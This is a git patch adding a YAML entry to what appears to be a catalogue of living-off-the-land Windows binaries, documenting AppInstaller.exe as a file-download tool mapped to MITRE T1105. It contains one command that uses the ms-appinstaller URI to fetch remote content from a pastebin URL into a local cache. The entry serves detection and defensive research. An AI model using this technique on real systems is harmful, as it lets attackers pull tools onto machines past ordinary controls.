From b381d04faf527381b75194314a400f9da2f86a87 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Wed, 2 Dec 2020 11:35:49 -0500 Subject: [PATCH] Create AppInstaller.yml New lolbin for downloading files in Windows 10. --- yml/OSBinaries/AppInstaller.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/AppInstaller.yml diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml new file mode 100644 index 0000000..2b7c39d --- /dev/null +++ b/yml/OSBinaries/AppInstaller.yml @@ -0,0 +1,22 @@ +--- +Name: AppInstaller.exe +Description: Tool used for installation of AppX/MSIX applications on Windows 10 +Author: 'Wade Hickey' +Created: '2020-12-02' +Commands: + - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1333900137232523264 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +---